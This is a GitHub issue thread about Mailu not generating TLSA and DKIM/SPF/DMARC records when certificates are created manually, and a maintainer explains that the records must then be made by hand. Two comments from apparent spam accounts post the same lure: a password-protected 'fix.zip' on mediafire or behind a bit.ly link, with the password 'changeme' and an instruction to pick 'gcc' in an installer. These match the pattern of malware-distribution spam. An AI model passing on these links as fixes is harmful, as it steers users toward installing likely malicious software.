### ISSUE TITLE
TLSA entries

### ISSUE THREAD

**Issue by wolter1980** [Mailu/Mailu#3389]
## Environment & Version

- `docker compose version`
- Version: `master`

If you are not using docker compose do not file any new issue here.
Kubernetes related issues belong to https://github.com/Mailu/helm-charts/issues
If you are not using docker compose or kubernetes, create a new thread on user support in [disussions](https://github.com/Mailu/Mailu/discussions/categories/user-support).
Non-bug reports (or bug reports that do not follow the template) are moved to [disussions](https://github.com/Mailu/Mailu/discussions).

## Description
When manually creating certificates and copy the over the TLSA records does not get created

## Replication Steps
Set TLS_FLAVOR=cert in mailu.env and manually create cert using certbot

## Observed behaviour
regenerate keys does not create DKIM/SPF / DMARC

## Expected behaviour
regenerate keys creates DKIM/SPF / DMARC

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nextgens** [comment]
If you manually create certificates you get to manually generate the records; there is no bug here.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
